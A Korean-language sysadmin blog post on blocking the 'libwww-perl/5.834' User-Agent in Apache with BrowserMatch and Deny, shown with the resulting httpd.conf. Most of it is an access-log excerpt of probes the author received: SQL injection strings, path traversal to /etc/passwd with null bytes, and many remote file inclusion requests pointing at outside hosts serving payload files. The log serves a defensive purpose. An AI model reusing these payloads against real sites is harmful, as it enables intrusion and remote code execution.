리눅스 – 아파치 특정 User-Agent 차단

특정 User-Agent 를 아파치의 BrowserMatch 와 Deny 지시자를 이용하여 차단 해줄수 있습니다.
필자는 개인 블로그 돌리다보니 libwww-perl/5.834 라는 User-Agent 가 오래전부터 웹서버에 접근 해오고 있어 눈에 좀 거슬렸습니다.
아래는 필자의 개인 블로그에 불법 접근한 User-Agent 로그 입니다.

[root@yongbok ~]# cat /home/apache2-log/www/www-access*.log | egrep “libwww-perl|5.834″ | awk -F” ” ‘{ print $1 $3 $6 $7 $8 $9 }’

203.253.25.15-“GET/blog/?page=18/news.php?id=’HTTP/1.1″404
203.253.25.15-“GET/news.php?id=’HTTP/1.1″302
203.253.25.15-“GET/error/HTTP/1.1″200
203.253.25.15-“GET/blog/news.php?id=’HTTP/1.1″404
203.253.25.15-“GET/blog/?page=18/news.php?id=’HTTP/1.1″404
203.253.25.15-“GET/news.php?id=’HTTP/1.1″302
203.253.25.15-“GET/error/HTTP/1.1″200
203.253.25.15-“GET/blog/news.php?id=’HTTP/1.1″404
61.100.181.218-“GET/blog/tag/%C4%B3%BD%C3//home.php?cat=’HTTP/1.1″200
61.100.181.218-“GET//home.php?cat=’HTTP/1.1″302
61.100.181.218-“GET/error/HTTP/1.1″200
61.100.181.218-“GET/blog/tag//home.php?cat=’HTTP/1.1″200
140.133.14.33-“GET/blog/tag/%BE%C6%C6%C4%C4%A1%20%20///?_SERVER[DOCUMENT_ROOT]=http://cord.atw.hu/~lamaq/r0x-id.txt?HTTP/1.1″200
140.133.14.33-“GET/blog/51%20%20///?_SERVER[DOCUMENT_ROOT]=http://cord.atw.hu/~lamaq/r0x-id.txt?HTTP/1.1″404
140.133.14.33-“GET/blog/%20%20///?_SERVER[DOCUMENT_ROOT]=http://cord.atw.hu/~lamaq/r0x-id.txt?HTTP/1.1″404
211.202.2.220-“GET/blog/tag/php%20%20//php/init.poll.php?include_class=http://cord.atw.hu/~lamaq/r0x-id.txt?HTTP/1.1″200
202.30.198.28-“GET/blog/51//?_SERVER[DOCUMENT_ROOT]=http://www.campusdni.com/bbs/duta/idtasik.txt???HTTP/1.1″404
202.30.198.28-“GET//?_SERVER[DOCUMENT_ROOT]=http://www.campusdni.com/bbs/duta/idtasik.txt???HTTP/1.1″200
202.30.198.28-“GET/blog//?_SERVER[DOCUMENT_ROOT]=http://www.campusdni.com/bbs/duta/idtasik.txt???HTTP/1.1″200
202.30.198.28-“GET/blog/tag//?_SERVER[DOCUMENT_ROOT]=http://www.campusdni.com/bbs/duta/idtasik.txt???HTTP/1.1″200
202.30.198.28-“GET/blog/tag/php//?_SERVER[DOCUMENT_ROOT]=http://www.campusdni.com/bbs/duta/idtasik.txt???HTTP/1.1″200
218.38.56.83-“GET/blog/entry/Nmap-%C6%F7%C6%AE-%BD%BA%C4%B3%B3%CA//admin/scan.php?donsimg_base_path=http://dbcc.co.kr//bbs/icon/albania.txt??HTTP/1.1″404
218.38.56.83-“GET//admin/scan.php?donsimg_base_path=http://dbcc.co.kr//bbs/icon/albania.txt??HTTP/1.1″302
218.38.56.83-“GET/error/HTTP/1.1″200
218.38.56.83-“GET/blog/entry//admin/scan.php?donsimg_base_path=http://dbcc.co.kr//bbs/icon/albania.txt??HTTP/1.1″404
210.48.154.208-“GET/blog/tag/Exploite0+order+by+9999999–HTTP/1.1″200
210.48.154.208-“GET/blog/37?category=00+order+by+9999999–HTTP/1.1″302
210.48.154.208-“GET/error/permissionHTTP/1.1″301
210.48.154.208-“GET/error/permission/HTTP/1.1″200
221.143.49.246-“GET/blog/tag/php/art_term.php?Term=’HTTP/1.1″200
221.143.49.246-“GET/art_term.php?Term=’HTTP/1.1″302
221.143.49.246-“GET/error/HTTP/1.1″200
221.143.49.246-“GET/blog/tag/art_term.php?Term=’HTTP/1.1″200
222.231.1.132-“GET/blog/tag/php/toolmethod.php?id=’HTTP/1.1″200
222.231.1.132-“GET/toolmethod.php?id=’HTTP/1.1″302
222.231.1.132-“GET/error/HTTP/1.1″200
222.231.1.132-“GET/blog/tag/toolmethod.php?id=’HTTP/1.1″200
222.231.1.132-“GET/blog/?page=3/modules.php?mod=’HTTP/1.1″404
222.231.1.132-“GET/modules.php?mod=’HTTP/1.1″302
222.231.1.132-“GET/error/HTTP/1.1″200
222.231.1.132-“GET/blog/modules.php?mod=’HTTP/1.1″404
222.231.1.132-“GET/blog/51/=’HTTP/1.1″404
222.231.1.132-“GET/=’HTTP/1.1″302
222.231.1.132-“GET/error/HTTP/1.1″200
222.231.1.132-“GET/blog/=’HTTP/1.1″404
202.169.44.140-“GET/blog/tag/296%20%20//php/init.poll.php?include_class=http://ucci.zxq.net/.x/r0x-id.txt?HTTP/1.1″200
222.231.1.132-“GET/blog/tag/php/rueckruf_produktinfo.php?id=’HTTP/1.1″200
222.231.1.132-“GET/rueckruf_produktinfo.php?id=’HTTP/1.1″302
222.231.1.132-“GET/error/HTTP/1.1″200
222.231.1.132-“GET/blog/tag/rueckruf_produktinfo.php?id=’HTTP/1.1″200
222.231.1.132-“GET/blog/51/rueckruf_produktinfo.php?id=’HTTP/1.1″404
222.231.1.132-“GET/blog/rueckruf_produktinfo.php?id=’HTTP/1.1″404
222.231.1.132-“GET/blog/tag/php/ccashow.php?k=’HTTP/1.1″200
222.231.1.132-“GET/ccashow.php?k=’HTTP/1.1″302
222.231.1.132-“GET/error/HTTP/1.1″200
222.231.1.132-“GET/blog/tag/ccashow.php?k=’HTTP/1.1″200
222.231.1.132-“GET/blog/51/ccashow.php?k=’HTTP/1.1″404
222.231.1.132-“GET/blog/ccashow.php?k=’HTTP/1.1″404
221.143.49.246-“GET/blog/archive/20081203/ident.php?id=’HTTP/1.1″200
221.143.49.246-“GET/ident.php?id=’HTTP/1.1″301
221.143.49.246-“GET/blog/archive/ident.php?id=’HTTP/1.1″200
221.143.49.246-“GET/blog/entry/Nmap-%C6%F7%C6%AE-%BD%BA%C4%B3%B3%CA/ident.php?id=’HTTP/1.1″404
221.143.49.246-“GET/ident.php?id=’HTTP/1.1″302
221.143.49.246-“GET/error/HTTP/1.1″200
221.143.49.246-“GET/blog/entry/ident.php?id=’HTTP/1.1″404
222.117.13.173-“GET/blog/feeder?1263245983437HTTP/1.1″200
220.80.108.81-“GET/blog/tag/php//forum/install.php?phpbb_root_dir=http://crocifissonegro.hellospace.net/A51/id.txt????HTTP/1.1″200
220.80.108.81-“GET//forum/install.php?phpbb_root_dir=http://crocifissonegro.hellospace.net/A51/id.txt????HTTP/1.1″302
220.80.108.81-“GET/error/HTTP/1.1″200
220.80.108.81-“GET/blog/tag//forum/install.php?phpbb_root_dir=http://crocifissonegro.hellospace.net/A51/id.txt????HTTP/1.1″200
220.80.108.81-“GET/blog/59//forum/install.php?phpbb_root_dir=http://crocifissonegro.hellospace.net/A51/id.txt????HTTP/1.1″404
220.80.108.81-“GET/blog//forum/install.php?phpbb_root_dir=http://crocifissonegro.hellospace.net/A51/id.txt????HTTP/1.1″404
222.231.1.132-“GET/blog/tag/php/patiototaal.php?id=’HTTP/1.1″200
222.231.1.132-“GET/patiototaal.php?id=’HTTP/1.1″302
222.231.1.132-“GET/error/HTTP/1.1″200
222.231.1.132-“GET/blog/tag/patiototaal.php?id=’HTTP/1.1″200
222.231.1.132-“GET/blog/51/patiototaal.php?id=’HTTP/1.1″404
222.231.1.132-“GET/blog/patiototaal.php?id=’HTTP/1.1″404
125.248.104.130-“GET/error/permissionHTTP/1.1″301
125.248.104.130-“GET/error/permission/HTTP/1.1″200
125.248.104.130-“GET/error/permissionHTTP/1.1″301
125.248.104.130-“GET/error/permission/HTTP/1.1″200
125.248.104.130-“GET/error/permissionHTTP/1.1″301
125.248.104.130-“GET/error/permission/HTTP/1.1″200
125.248.104.130-“GET/error/permissionHTTP/1.1″301
125.248.104.130-“GET/error/permission/HTTP/1.1″200
209.216.203.109-“GET/blog/6755’HTTP/1.1″404
209.216.203.109-“GET/6755’HTTP/1.1″302
209.216.203.109-“GET/error/HTTP/1.1″200
209.216.203.109-“GET/blog/6755’HTTP/1.1″404
209.216.203.109-“GET/6755’HTTP/1.1″302
209.216.203.109-“GET/error/HTTP/1.1″200
168.188.31.131-“GET/blog/tag/98//?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/rfi1.txt??HTTP/1.1″200
168.188.31.131-“GET//?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/rfi1.txt??HTTP/1.1″200
168.188.31.131-“GET/blog/tag//?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/rfi1.txt??HTTP/1.1″200
200.150.228.50-“GET//cgi-awstats/awstats.pl?output=http://ppslaterent.com/brd/gid.gif???HTTP/1.1″302
200.150.228.50-“GET/blog//cgi-awstats/awstats.pl?output=http://ppslaterent.com/brd/gid.gif???HTTP/1.1″404
200.150.228.50-“GET/blog/98//cgi-awstats/awstats.pl?output=http://ppslaterent.com/brd/gid.gif???HTTP/1.1″404
200.150.228.50-“GET/error/HTTP/1.1″200
221.139.2.6-“GET/blog/atom/response/51//atom.php5?page=http://art.srru.ac.th/images/blank.gif??HTTP/1.1″404
221.139.2.6-“GET//atom.php5?page=http://art.srru.ac.th/images/blank.gif??HTTP/1.1″302
221.139.2.6-“GET/error/HTTP/1.1″200
221.139.2.6-“GET/blog/atom/response//atom.php5?page=http://art.srru.ac.th/images/blank.gif??HTTP/1.1″404
222.122.45.62-“GET/blog/entry/ShoutCast-MP3-Codec/buy.php?category=’HTTP/1.1″404
222.122.45.62-“GET/buy.php?category=’HTTP/1.1″301
222.122.45.62-“GET/blog/entry/buy.php?category=’HTTP/1.1″404
222.122.45.62-“GET/blog/entry/ShoutCast-MP3-Codec/buy.php?category=’HTTP/1.1″404
222.122.45.62-“GET/buy.php?category=’HTTP/1.1″301
222.122.45.62-“GET/blog/entry/buy.php?category=’HTTP/1.1″404
210.205.6.233-“GET/blog/archive/200906/forum/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/http://bodycushion.com.au//components/com_virtuemart/shop_image/vendor/lol/id.txt????HTTP/1.1″200
210.205.6.233-“GET/forum/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/http://bodycushion.com.au//components/com_virtuemart/shop_image/vendor/lol/id.txt????HTTP/1.1″302
210.205.6.233-“GET/error/HTTP/1.1″200
210.205.6.233-“GET/blog/archive/forum/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/http://bodycushion.com.au//components/com_virtuemart/shop_image/vendor/lol/id.txt????HTTP/1.1″200
168.188.31.131-“GET/blog/entry/Linux-Kernel-2617-26241-vmsplice-Local-Root-Exploit///delete_all.php?board_skin_path=http://mnes.co.kr/gnuboard/injek.txt??HTTP/1.1″404
168.188.31.131-“GET///delete_all.php?board_skin_path=http://mnes.co.kr/gnuboard/injek.txt??HTTP/1.1″302
168.188.31.131-“GET/error/HTTP/1.1″200
168.188.31.131-“GET/blog/entry///delete_all.php?board_skin_path=http://mnes.co.kr/gnuboard/injek.txt??HTTP/1.1″404
168.188.31.131-“GET/blog/?page=4///delete_all.php?board_skin_path=http://mnes.co.kr/gnuboard/injek.txt??HTTP/1.1″404
168.188.31.131-“GET/blog///delete_all.php?board_skin_path=http://mnes.co.kr/gnuboard/injek.txt??HTTP/1.1″404
168.188.31.131-“GET/blog/?page=25///delete_all.php?board_skin_path=http://mnes.co.kr/gnuboard/injek.txt??HTTP/1.1″404
168.188.31.131-“GET///delete_all.php?board_skin_path=http://mnes.co.kr/gnuboard/injek.txt??HTTP/1.1″302
168.188.31.131-“GET/error/HTTP/1.1″200
168.188.31.131-“GET/blog///delete_all.php?board_skin_path=http://mnes.co.kr/gnuboard/injek.txt??HTTP/1.1″404
78.40.224.168-“GET/blog/92%20%20/index.php?load=http://ircterror.altervista.org/irc/id.txt?HTTP/1.1″404
78.40.224.168-“GET/blog/%20%20/index.php?load=http://ircterror.altervista.org/irc/id.txt?HTTP/1.1″404
124.199.222.150-“GET/Videos/hacking/wireless_wep_crack.aviHTTP/1.1″200
221.143.40.35-“GET/blog/51//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″404
221.143.40.35-“GET//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″200
221.143.40.35-“GET/blog//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″200
221.143.40.35-“GET/blog/tag/88//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″200
221.143.40.35-“GET/blog/tag//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″200
221.143.40.35-“GET/blog/tag//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″200
221.143.40.35-“GET//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″200
221.143.40.35-“GET/blog/tag/php//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″200
221.143.40.35-“GET/blog/?page=4//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″404
221.143.40.35-“GET/blog//?_SERVER[DOCUMENT_ROOT]=http://www.snapdrive.net/files/626361/idku.txt???HTTP/1.1″200
213.5.71.12-“POST/blog/comment/add/53HTTP/1.1″200
61.109.250.22-“GET/blog/87?category=1///include.php?path[docroot]=http://www.seolbong.es.kr/bbs/…/com_sef/id??HTTP/1.1″302
61.109.250.22-“GET/error/permissionHTTP/1.1″301
61.109.250.22-“GET/error/permission/HTTP/1.1″200
61.109.250.22-“GET///include.php?path[docroot]=http://www.seolbong.es.kr/bbs/…/com_sef/id??HTTP/1.1″302
61.109.250.22-“GET/error/permissionHTTP/1.1″301
61.109.250.22-“GET/error/permission/HTTP/1.1″200
61.109.250.22-“GET/blog///include.php?path[docroot]=http://www.seolbong.es.kr/bbs/…/com_sef/id??HTTP/1.1″302
61.109.250.22-“GET/error/permissionHTTP/1.1″301
61.109.250.22-“GET/error/permission/HTTP/1.1″200
115.68.22.73-“GET/blog/98//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://www.mantou.co.kr//data/log/id.txt????HTTP/1.1″404
115.68.22.73-“GET//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://www.mantou.co.kr//data/log/id.txt????HTTP/1.1″302
115.68.22.73-“GET/blog//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://www.mantou.co.kr//data/log/id.txt????HTTP/1.1″404
115.68.22.73-“GET/error/HTTP/1.1″200
220.70.97.126-“GET/blog/feeder?1264518341573HTTP/1.1″200
220.70.97.126-“GET/blog/feeder?1264518349027HTTP/1.1″200
220.80.108.81-“GET/!*.php?page=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/blog/!*.php?page=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/blog/?page=4/!*.php?page=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/error/permission/HTTP/1.1″200
220.80.108.81-“GET/error/permission/HTTP/1.1″200
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/error/permission/HTTP/1.1″200
61.250.92.167-“GET/blog/tag/125//appserv/main.php?appserv_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif??HTTP/1.1″200
61.250.92.167-“GET//appserv/main.php?appserv_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif??HTTP/1.1″302
61.250.92.167-“GET/error/HTTP/1.1″200
61.250.92.167-“GET/blog/tag//appserv/main.php?appserv_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif??HTTP/1.1″200
61.100.30.5-“GET/blog/tag/%C4%B3%BD%C3//xcart/customer/home.php?cat=’HTTP/1.1″200
61.100.30.5-“GET//xcart/customer/home.php?cat=’HTTP/1.1″302
61.100.30.5-“GET/error/HTTP/1.1″200
61.100.30.5-“GET/blog/tag//xcart/customer/home.php?cat=’HTTP/1.1″200
222.232.119.252-“GET/blog/92/group.php?v=’HTTP/1.1″404
222.232.119.252-“GET/group.php?v=’HTTP/1.1″302
222.232.119.252-“GET/error/HTTP/1.1″200
222.232.119.252-“GET/blog/group.php?v=’HTTP/1.1″404
84.38.160.77-“GET/blog/87?category=1//php/init.poll.php?include_class=http://portlandraiders.org/templates/kampret.txt??HTTP/1.1″200
84.38.160.77-“GET//php/init.poll.php?include_class=http://portlandraiders.org/templates/kampret.txt??HTTP/1.1″302
84.38.160.77-“GET/error/HTTP/1.1″200
84.38.160.77-“GET/blog//php/init.poll.php?include_class=http://portlandraiders.org/templates/kampret.txt??HTTP/1.1″404
222.122.158.155-“GET/buy.php?category=http://nci.or.kr/dreampnd_castle-php/id.txt???HTTP/1.1″302
222.122.158.155-“GET/error/HTTP/1.1″200
222.122.158.155-“GET/blog/27/buy.php?category=http://nci.or.kr/dreampnd_castle-php/id.txt???HTTP/1.1″404
222.122.158.155-“GET/blog/buy.php?category=http://nci.or.kr/dreampnd_castle-php/id.txt???HTTP/1.1″404
211.193.131.164-“GET/blog/27/buy.php?category=’HTTP/1.1″404
211.193.131.164-“GET/buy.php?category=’HTTP/1.1″302
211.193.131.164-“GET/error/HTTP/1.1″200
211.193.131.164-“GET/blog/buy.php?category=’HTTP/1.1″404
61.250.92.167-“GET/blog/tag/php//picture.php/xml/path_root/path?=http://test.bigshop.cz/uploaded/injek.txt??HTTP/1.1″200
61.250.92.167-“GET//picture.php/xml/path_root/path?=http://test.bigshop.cz/uploaded/injek.txt??HTTP/1.1″302
61.250.92.167-“GET/error/HTTP/1.1″200
61.250.92.167-“GET/blog/tag//picture.php/xml/path_root/path?=http://test.bigshop.cz/uploaded/injek.txt??HTTP/1.1″200
61.250.92.167-“GET/blog/59//picture.php/xml/path_root/path?=http://test.bigshop.cz/uploaded/injek.txt??HTTP/1.1″404
61.250.92.167-“GET//picture.php/xml/path_root/path?=http://test.bigshop.cz/uploaded/injek.txt??HTTP/1.1″302
61.250.92.167-“GET/error/HTTP/1.1″200
61.250.92.167-“GET/blog//picture.php/xml/path_root/path?=http://test.bigshop.cz/uploaded/injek.txt??HTTP/1.1″404
220.80.108.81-“GET/index.php?theme=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/blog/tag/php/index.php?theme=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/error/permission/HTTP/1.1″200
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/blog/tag/index.php?theme=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/error/permission/HTTP/1.1″200
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/error/permission/HTTP/1.1″200
220.80.108.81-“GET/blog/tag/index.php?theme=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/blog/tag/php/index.php?theme=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/index.php?theme=../../../../../../../../../../../../../etc/passwd%00HTTP/1.1″302
220.80.108.81-“GET/error/permissionHTTP/1.1″301
220.80.108.81-“GET/error/permission/HTTP/1.1″200
220.80.108.81-“GET/error/permission/HTTP/1.1″200
220.80.108.81-“GET/error/permission/HTTP/1.1″200
211.193.131.164-“GET/blog/99/blank.php?o=’HTTP/1.1″404
211.193.131.164-“GET/blank.php?o=’HTTP/1.1″302
211.193.131.164-“GET/error/HTTP/1.1″200
211.193.131.164-“GET/blog/blank.php?o=’HTTP/1.1″404
211.193.131.164-“GET/blog/27/buy.php?category=’HTTP/1.1″404
211.193.131.164-“GET/buy.php?category=’HTTP/1.1″302
211.193.131.164-“GET/error/HTTP/1.1″200
211.193.131.164-“GET/blog/buy.php?category=’HTTP/1.1″404

BrowserMatch 를 사용하려면 아파치의 mod_setenvif 모듈이 있어야 하며 최신 버전이라면 기본적으로 들어가 있습니다.

[root@yongbok ~]# cat /usr/local/apache2/conf/httpd.conf | grep mod_setenvif
LoadModule setenvif_module modules/mod_setenvif.so

BrowserMatch 을 이용해 특정 User-Agent 를 차단 해주시면 됩니다.

<VirtualHost *:80>
ServerName www.yongbok.net
ServerAdmin ruo91@yongbok.net
ServerAlias yongbok.com www.yongbok.com yongbok.net www.yongbok.net
DocumentRoot /home/www/
#—– Error Logs —–#
LogLevel warn
CustomLog “|/usr/local/apache2/bin/rotatelogs /home/apache2-log/www/www-access-%Y-%m-%d.log 86400” combined env=!do_not_log
ErrorLog /home/apache2-log/www-error.log
#
#—– Error Document Page —–#
ErrorDocument 403 http://www.yongbok.net/error/permission
ErrorDocument 404 http://www.yongbok.net/error/
#
#—– User-Agent —–#
BrowserMatch “libwww-perl/5.834” get_out
#
#—– Directoy Options —–#
<Directory “/home/www”>
Options FollowSymLinks
AllowOverride FileInfo AuthConfig
Order allow,deny
Allow from all
Deny from env=get_out
</Directory>
</VirtualHost>

참고
http://httpd.apache.org/docs/2.0/mod/mod_setenvif.html#browsermatch